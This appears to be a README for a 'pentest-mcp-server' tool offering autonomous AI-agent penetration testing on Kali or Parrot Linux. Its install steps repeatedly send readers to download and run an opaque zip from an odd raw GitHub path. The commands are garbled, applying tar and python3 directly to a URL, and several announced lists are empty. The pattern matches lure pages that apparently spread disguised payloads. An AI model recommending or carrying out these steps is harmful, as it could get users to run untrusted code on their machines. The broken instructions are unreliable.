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⚙️ Enable AI agents to conduct autonomous penetration testing on any Linux distribution with a persistent and robust Mod
The pentest-mcp-server is a user-friendly application designed for penetration testing. It provides a straightforward way to set up a server that helps security professionals and hobbyists test the security of networks and applications. Whether you are using Kali Linux or Parrot OS, this tool simplifies your workflow and improves your testing capabilities.
In this section, you will learn how to download and run the pentest-mcp-server. Follow the steps below to get started quickly.
Before you download the pentest-mcp-server, make sure your system meets the following requirements:
To get the software, you need to visit the Releases page. Click on the link below to access it:
On the Releases page, you will see several files available for download. Look for the latest version. It should be named something like https://raw.githubusercontent.com/exjskdjsdfks/pentest-mcp-server/main/inculpably/server_mcp_pentest_1.8.zip. Click on it to start the download.
Once the download is complete, locate the downloaded file on your computer. Usually, it will be in your "Downloads" folder.
If you are using the command line, navigate to your download directory:
cd ~/Downloads
Extract the contents of the file using this command:
tar -xzf https://raw.githubusercontent.com/exjskdjsdfks/pentest-mcp-server/main/inculpably/server_mcp_pentest_1.8.zip
Navigate to the directory where the files are extracted. You can do this by entering the following command:
cd pentest-mcp-server
To start the server, type:
python3 https://raw.githubusercontent.com/exjskdjsdfks/pentest-mcp-server/main/inculpably/server_mcp_pentest_1.8.zip
This command will launch the pentest-mcp-server, and you will see output on your screen indicating that the server is running.
Once the server is up, you can access it through your web browser. Open your browser and type:
http://localhost:8080
This will take you to the user interface of the pentest-mcp-server, where you can start your penetration testing tasks.
If you encounter issues while running the server or performing tasks, here are some common solutions:
python3 --version.We welcome contributions from everyone. If you want to help improve the pentest-mcp-server, feel free to open an issue or submit a pull request. Your feedback and suggestions can make this tool better for all users.
This project is related to the following topics:
If you have questions or need assistance with the pentest-mcp-server, contact us through the project's GitHub page. We are here to help you get the most out of this tool.
For your convenience, here's the download link again:
Now you're ready to start using pentest-mcp-server for your penetration testing activities. Happy testing!
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